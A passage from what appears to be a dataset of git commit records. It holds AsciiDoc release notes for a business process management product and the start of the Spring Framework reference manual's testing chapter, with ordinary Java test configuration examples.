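\n\nAs a minimal usage sketch only -- the names below assume the jBPM services API (`org.jbpm.services.api.admin.ProcessInstanceAdminService`), and the `adminService` reference and the various ids are illustrative, not prescriptive:\n\n[source,java]\n----\n\/\/ Sketch: assumes an injected or looked-up ProcessInstanceAdminService.\nCollection<ProcessNode> nodes = adminService.getProcessNodes(processInstanceId); \/\/ all process definition nodes\nCollection<TimerInstance> timers = adminService.getTimerInstances(processInstanceId); \/\/ list active timer instances\nadminService.updateTimer(processInstanceId, timerId, delay, period, repeatLimit); \/\/ relative timer update\nadminService.retriggerNodeInstance(processInstanceId, nodeInstanceId); \/\/ retrigger a node instance\n----\n\n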
=== Advanced task routing\nWhen tasks are assigned to a group of users, you can use pluggable task assignment strategies to automatically assign tasks to a suitable individual immediately. This enables more efficient task allocation, based on all properties associated with the task (for example, potential owners and task priority, but also task data that includes information such as geography and required skills). You can use business rules to define the assignment logic, making it easy to customize this to your needs.\n\n=== Process execution server\nThe process execution server (also known as kie-server) has been extended to support core engine features and offers a remote API for these operations. In addition, the following architectural changes were introduced.\n\n==== Separate Business Central from execution server\nBusiness Central now delegates all of its requests to the execution server as well. The main advantage is that Business Central can now be used to monitor any set of execution servers. By linking the execution server to Business Central, the process and task monitoring UIs in Business Central can now connect to this execution server and show all relevant information. When multiple independent execution servers are used, you can either connect to a specific one or use the smart router to aggregate information across multiple servers.\n\n==== Smart router\nThe smart router (also known as kie-server-router) can be used as a proxy to help manage multiple independent process execution servers.\n\n==== Aliases\nYou can now use aliases instead of container IDs in the remote REST APIs of the execution server. For more information, see the \"Editing container aliases through Business Central\" section of the _{PRODUCT} User Guide_.\n \n=== Business Central Monitoring web application\nA new distribution `war` file that enables you to build custom cloud images has been added in this release. The Business Central Monitoring web application should be used with Decision Server instances to manage all runtime capabilities in the cloud. This includes managing containers, process instances, tasks, and dashboards. Unlike the standard Business Central distribution, no authoring capabilities are offered.\n\nNOTE: For on-premise deployments, use the standard Business Central `war` file.\n \n=== Work Item archetype\n\nTo help users build custom service tasks (work items), {PRODUCT} comes with the Work Item archetype that generates the majority of items required to build a custom service task. It includes:\n\n* A Work Item Definition (WID) file\n* The Work Item Handler implementation class\n* The Work Item Handler test class\n\nThe Maven assembly (zip) packages everything at build time so it can be consumed by the Service Repository and therefore be used from within the Web Designer.\n\n=== KIE Server Maven plugins\nKIE Server has been enhanced with additional Maven plugins that enable interaction with the KIE Server and KIE Controller REST API directly from within a build. This facilitates easier integration with CI\/CD pipelines when building KJars so they can be directly deployed to the execution environment (both managed and unmanaged KIE Servers).\n\n== Business Resource Planner\n* Multi-threaded partitioned search is available. Business Resource Planner now has out-of-the-box support for solving a single data set by partitioning across multiple threads. This enhancement makes use of multiple CPU cores for a single problem. Partitioned search can implement geo-fencing for Vehicle Routing use cases.\n* The Solution interface is deprecated. Your solution class requires only the `@PlanningSolution` annotation.\n* You no longer need to define the score type in the solver configuration. Business Resource Planner now picks it up automatically from the domain model.\n* The Business Resource Planner Solver editor screen now supports adding all termination types, including composite termination. 
The phase configuration section enables you to tweak Construction Heuristic settings and select Local Search algorithm to optimize your planning problem.\n* Examples are now part of Business Central and they work offline as well. Leverage tag-based filtering to quickly access projects from the field you are interested in.\n* The Business Resource Planner domain editor can now specify a planning entity difficulty. Navigate through the object hierarchy and define the sorting attributes. Several construction heuristic algorithms use this information to construct a better initial solution.\n* The Business Resource Planner execution server now supports real-time planning.\n\n\n","old_contents":"\n[[bxms_rn_whats_new]]\n= What's New\n\nThis section highlights new features in {PRODUCT} {PRODUCT_VERSION} Limited Availability.\n\n== Business Central\n \n=== Improved Navigation\n\n.Navigation between views\nYou can now navigate as follows:\n\n* From a process instance to the associated jobs\n* From a job to the associated process instance\n* From a process instance to the associated tasks\n\n.Business Central Home page\nThe Business Central Home page has been redesigned for easier navigation. For more information, see the \"Business Central\" chapter of the _{PRODUCT} User Guide_.\n\n=== Guided Decision Table\n* Guided Decision Table has a new wizard for creating and editing columns.\n* Hit policies are now available. Hit policies determine the order in which rules (rows) in a guided decision table are applied.\n* New support to display multiple linked guided decision tables in the Guided Decision Table Editor has been added.\n\n=== Projects Metrics dashboard\nA new dashboard is now available for every project listed in the Projects perspective. The Projects Metrics dashboard shows all of your project contribution metrics in one place. This new dashboard replaces the Contributors page, which was part of the Authoring group. For more information, see the \"Projects Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== Team Metrics dashboard\nThe Team Metrics dashboard shows all project metrics by team in a single page. This new dashboard replaces the older Contributors page, which was part of the Authoring group. For more information, see the \"Team Metrics dashboard\" section of the _{PRODUCT} User Guide_.\n\n=== New columns available on process instances, tasks, and jobs\nThe following columns have been added to the corresponding perspectives:\n\n* Process instance list perspective: Last update and correlation key.\n* Task list: Last update, correlation key (of the associated process instance ID), process instance description (of the associated process instance).\n* Jobs perspective: Name of the associated process (if any), ID of the associated process instance (if any), Description of the associated process instance (if any).\n\n=== Advanced search filter\nYou can now search for specific data by using the *Search* tab on the Jobs, Process Instances, Tasks Administration, and Execution Errors perspectives. For information about the new search feature, see the \"Using the advanced search filter pages\" section of the _{PRODUCT} {RELEASE} User Guide_.\n\n=== New Task List and Task Administration perspectives\nThe former Task List perspective has been divided into the Tasks List and Task Administration perspectives. The Task List perspective is used by task operators to work with their assigned (or potentially assigned) tasks. 
The Task Administration perspective is used by administrators to manage tasks assigned to other users. This perspective is only available for users with admin or process-admin roles. It is similar to the Admin filter tab on the former Task List perspective.\n\n=== Improved validation in deployment descriptor editor\n\nThe deployment descriptor editor in Business Central has been improved to validate data entered for the following:\n\n* Work item handlers\n* Event listeners\n* Marshalling strategies\n* Globals\n* Environment entries\n* Configuration\n\nValidation is performed automatically when a build is invoked or manually when a user clicks *Validate*.\n\n=== Error Handling\nThe system now detects and stores execution errors such as exceptions while running a process instance or a job after the maximum number of retries has been exceeded. If an error occurs, an event is generated that contains the following data:\n\n--\n[cols=\"1,2\",options=\"header\"]\n|===\n| Data\n| Fields\n\n.3+| Process model\n| processModelID\n| processModelVersion\n| processModelName\n\n.2+| Process instance that has failed\n| processInstanceID\n| customProcessID\n\n.5+| Activity that has failed\n| activityID\n| activityName\n| activityType\n| iteration\n| status\n\n.2+| Error data\n| errorMessage: Message with the error that has occurred.\n| errorStack: Stack with error detail.\n|===\n--\n\nThe process instance list includes a new column that displays the number of errors per process instance which are not marked as acknowledged. When you select the column, a window appears which will enables you to navigate to the new Error perspective.\n\nThe Execution Errors perspective lists any errors that occur during process instances or executor service jobs on a Decision Server. Use this perspective to help troubleshoot issues. It is visible to users with the admin and process-admin roles.\n\n\n== Process Engine\n\n=== Process and task administration API\nA process administration API and task administration API have been introduced to simplify some of the more complex administrator use cases.\nThe process admin API enables you to:\n\n* Retrieve all process definition nodes\n* Cancel node instances\n* Retrigger node instances\n* Update the timer (absolute or relative)\n* List timer instances\n* Trigger nodes\n\nThe task administration API enables you to:\n\n* Add and remove potential owners and excluded owners and business administrators\n* Add and remove task inputs and outputs\n* List, create, and cancel escalations and notifications\n\n=== Advanced task routing\nWhen tasks are assigned to a group of users, you can use pluggable task assignment strategies to automatically assign tasks to a suitable individual immediately. This enables more efficient task allocation, based on all properties associated with the task (for example potential owners and task priority but also task data that includes information such as geography, required skills, and so forth). You can use business rules to define the assignment logic, making it easy to customize this to your needs.\n\n=== Process execution server\nThe process execution server (also known as kie-server) has been extended to support core engine features and offers a remote API for these operations. In addition the following architectural changes were introduced.\n\n==== Separate Business Central from execution server\nBusiness Central now delegates all of its requests to the execution server as well. 
The main advantage is that Business Central can now be used to monitor any set of execution servers. By linking the execution server to Business Central, the process and task monitoring UIs in Business Central can now connect to this execution server and show all relevant information. When multiple independent execution servers are used, you can either connect to a specific one or use the smart router to aggregate information across multiple servers. \n\n==== Smart router\nThe smart router (also known as kie-server-router) can be used as a proxy to help manage multiple independent process execution servers.\n\n=== Aliases\nYou can now use aliases instead of container IDs in the remote REST APIs of the execution server. For more information, see the \"Editing container aliases through Business Central\" section of the _{PRODUCT} User Guide_.\n \n=== Business Central Monitoring web application\nA new distribution `war` file that enables you to build custom cloud images has been added in this release.The Business Central Monitoring web application should be used with Decision Server instances to manage all run time capabilities in the cloud. This includes managing containers, process instances, tasks, and dashboards. Unlike the standard Business Central distribution, no authoring capabilities are offered.\n\nNOTE:\nFor on premise deployments, use the standard Business Central `war` file.\n \n=== Work Item archetype\n\nTo help users build custom service tasks (work items), {PRODUCT} comes with the Work Item archetype that generates the majority of items required to build a custom service task. It does include:\n\n* A Work Item Definition (WID) file\n* The Work Item Handler implementation class\n* The Work Item Handler test class\n\nThe Maven assembly (zip) packages everything at build time so it can be consumed by the Service Repository and therefore be used from within the Web Designer.\n\n=== KIE Server Maven plugins\nKIE Server has been enhanced with additional Maven plugins that enable interaction with the KIE Server and KIE Controller REST API directly from within a build. This facilitates easier integration with CI\/CD pipelines when building KJars so they can be directly deployed to the execution environment (both managed and unmanaged KIE Servers).\n\n== Business Resource Planner\n* Multi-threaded partitioned search is available. Business Resource Planner now has out-of-the box support for solving a single data set by partitioning across multiple threads. This enhancement makes use of multiple CPU cores for a single problem. Partitioned search can implement geo-fencing for Vehicle Routing use cases. \n* The Solution interface is deprecated. Your solution class requires only the `@PlanningSolution` annotation.\n* You no longer need to define the score type in the solver configuration. Business Resource Planner now picks it up automatically from the domain model.\n* The Business Resource Planner Solver editor screen now supports adding all termination types, including composite termination. The phase configuration section enables you to tweak Construction Heuristic settings and select Local Search algorithm to optimize your planning problem.\n* Examples are now part of Business Central and they work offline as well. Leverage tag-based filtering to quickly access projects from the field you are interested in.\n* The Business Resource Planner domain editor can now specify a planning entity difficulty. Navigate through the object hierarchy and define the sorting attributes. 
Several construction heuristic algorithms use this information to construct a better initial solution.\n* The Business Resource Planner execution server now supports real-time planning.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b6f99e38ae35a25034df0eb3e7750b1036ea8ddd","subject":"Polish wording regarding previous release versions in reference manual","message":"Polish wording regarding previous release versions in reference manual\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/testing.adoc","new_file":"src\/asciidoc\/testing.adoc","new_contents":"[[testing]]\n= Testing\n\n[partintro]\n--\nThe adoption of the test-driven-development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so coverage of Spring's\nsupport for integration testing is covered (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and suchlike)... the chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n--\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see <<beans-definition-profiles>>\nand <<beans-property-source-abstraction>>). 
`MockEnvironment` and\n`MockPropertySource` are useful for developing __out-of-container__ tests for code that\ndepends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ++DataSource++s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. Since\nSpring Framework 4.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 3.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ++Controller++s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n[[mock-objects-portlet]]\n==== Portlet API\nThe `org.springframework.mock.web.portlet` package contains a set of Portlet API mock\nobjects, targeted at usage with Spring's Portlet MVC framework.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing Support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. 
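\n\nAs a brief illustration -- the `MyService` type, its `findMessage()` method, and the injected bean are hypothetical -- unwrapping a Mockito mock hidden behind a Spring proxy could look like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ static imports assumed: BDDMockito.given, Mockito.verify, Assert.assertEquals\n\n\t\/\/ the injected bean is a Mockito mock wrapped in a Spring proxy (e.g., a transactional proxy)\n\t@Autowired\n\tMyService myService;\n\n\t@Test\n\tpublic void verifiesAgainstTheUnderlyingMock() {\n\t\t\/\/ unwrap nested proxies until the naked mock is reached\n\t\tMyService mock = AopTestUtils.getUltimateTargetObject(myService);\n\t\tgiven(mock.findMessage()).willReturn(\"hello\");\n\n\t\tassertEquals(\"hello\", myService.findMessage());\n\t\tverify(mock).findMessage();\n\t}\n----\n\n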
For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ++Controller++s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ++Controller++s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n++ApplicationContext++s and ++WebApplicationContext++s as well as caching of those\ncontexts. 
Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ++DataSource++s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. 
By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. 
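\n\nAs a minimal sketch (the script names here are placeholders), an embedded database can be created and destroyed as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ build an in-memory database and populate it with the given classpath scripts\n\tEmbeddedDatabase db = new EmbeddedDatabaseBuilder()\n\t\t\t.generateUniqueName(true)\n\t\t\t.addScript(\"schema.sql\")\n\t\t\t.addScript(\"test-data.sql\")\n\t\t\t.build();\n\n\t\/\/ the embedded database is a javax.sql.DataSource; use it in the test...\n\n\tdb.shutdown();\n----\n\n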
For details, see <<jdbc-embedded-database-support>> and\n<<jdbc-embedded-database-dao-testing>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n* `@ContextConfiguration`\n\n+\n\nDefines class-level metadata that is used to determine how to load and configure an\n`ApplicationContext` for integration tests. Specifically, `@ContextConfiguration`\ndeclares the application context resource `locations` or the annotated `classes`\nthat will be used to load the context.\n\n+\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextInitializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\n+\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n* `@WebAppConfiguration`\n\n+\n\nA class-level annotation that is used to declare that the `ApplicationContext` loaded\nfor an integration test should be a `WebApplicationContext`. The mere presence of\n`@WebAppConfiguration` on a test class ensures that a `WebApplicationContext` will be\nloaded for the test, using the default value of `\"file:src\/main\/webapp\"` for the path to\nthe root of the web application (i.e., the __resource base path__). 
The resource base\npath is used behind the scenes to create a `MockServletContext` which serves as the\n`ServletContext` for the test's `WebApplicationContext`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no\nresource prefix is supplied the path is assumed to be a file system resource.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n+\n\n* `@ContextHierarchy`\n\n+\n\nA class-level annotation that is used to define a hierarchy of ++ApplicationContext++s\nfor integration tests. `@ContextHierarchy` should be declared with a list of one or more\n`@ContextConfiguration` instances, each of which defines a level in the context\nhierarchy. The following examples demonstrate the use of `@ContextHierarchy` within a\nsingle test class; however, `@ContextHierarchy` can also be used within a test class\nhierarchy.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n* `@ActiveProfiles`\n\n+\n\nA class-level annotation that is used to declare which __bean definition profiles__\nshould be active when loading an `ApplicationContext` for test classes.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n+\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. 
